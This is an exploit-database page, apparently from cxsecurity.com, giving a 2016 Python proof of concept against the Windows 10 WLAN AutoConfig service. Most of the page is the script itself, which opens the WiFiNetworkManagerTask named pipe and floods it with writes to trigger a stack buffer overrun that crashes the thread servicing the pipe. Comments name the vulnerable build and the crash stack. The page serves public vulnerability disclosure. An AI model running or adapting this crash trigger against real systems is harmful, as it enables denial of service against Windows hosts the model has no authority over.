Microsoft Windows 10 x86/x64 WLAN AutoConfig Named Pipe Proof Of Concept

2016.12.07
Credit: Jeremy Brown
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/python # wlanautoconfig-poc.py # # Windows WLAN AutoConfig Named Pipe POC # # Jeremy Brown [jbrown3264/gmail] # Dec 2016 # # > wifinetworkmanager.dll!__FatalError(char const *,unsigned # long,char const *, ...) # AsyncPipe::ReadCompletedCallback(void) # AsyncPipe::Dispatch(int,void *,void *, ...) # Synchronizer::EnqueueEvent(...) # AsyncPipe::ReadCompletedStatic(...) # # --> STATUS_STACK_BUFFER_OVERRUN @ svchost.exe # # Tested: # # Windows 10 x86/x64 BUILD 10.0.14393 (vulnerable) # Windows Server 2012 R2 x64 (not vulnerable, service doesn't create pipe) # # Dependencies: # # pip install pypiwin32 # # Notes: # # This won't kill Wlansvc service, but the thread servicing the pipe will terminate # import win32file import pywintypes import msvcrt BUF_SIZE = 4096 PIPE_NAME = r'\\.\pipe\WiFiNetworkManagerTask' def main(): try: handle = win32file.CreateFile(PIPE_NAME, win32file.GENERIC_WRITE, 0, None, win32file.OPEN_EXISTING, 0, None) except Exception: print("Error: CreateFile() failed\n") return fd = msvcrt.open_osfhandle(handle, 0) if(fd < 0): print("Error: open_osfhandle() failed\n") return buf = bytearray(b'\x42' * BUF_SIZE) # exact number here could vary, keeping it simple while True: win32file.WriteFile(handle, buf) if __name__ == "__main__": main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top